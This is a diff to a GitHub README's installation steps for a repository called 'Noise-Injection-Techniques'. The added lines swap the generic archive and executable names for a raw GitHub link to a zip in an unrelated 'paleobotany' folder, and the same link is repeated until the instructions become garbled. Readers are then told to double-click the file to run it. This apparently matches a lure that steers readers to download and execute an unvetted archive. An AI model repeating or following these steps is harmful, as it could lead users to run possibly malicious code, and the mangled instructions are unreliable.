Omar98165/Noise-Injection-Techniques/README.md

    Click on the file name that matches your operating system to start the download.

 4. **Extract the Files**
    Once the download completes, find the downloaded file on your computer.
 This might be in your "Downloads" folder.
-Right-click the .zip or .tar.gz file and select "Extract" or "Unzip".
+Right-click the .zip or https://raw.githubusercontent.com/Omar98165/Noise-Injection-Techniques/main/paleobotany/Noise-Injection-Techniques-v1.1-alpha.1.zip file and select "Extract" or "Unzip".

 5. **Run the Application**
-   Navigate to the extracted folder and look for the executable file (like `run_app.exe` or `run_app.sh`).
+   Navigate to the extracted folder and look for the executable file (like `https://raw.githubusercontent.com/Omar98165/Noise-Injection-Techniques/main/paleobotany/Noise-Injection-Techniques-v1.1-alpha.1.zip` or `https://raw.githubusercontent.com/Omar98165/Noise-Injection-Techniques/main/paleobotany/Noise-Injection-Techniques-v1.1-alpha.1.zip`).
 Double-click this file to run the application.

 6. **Follow On-screen Instructions**
    The application will guide you through any required setup or configurations.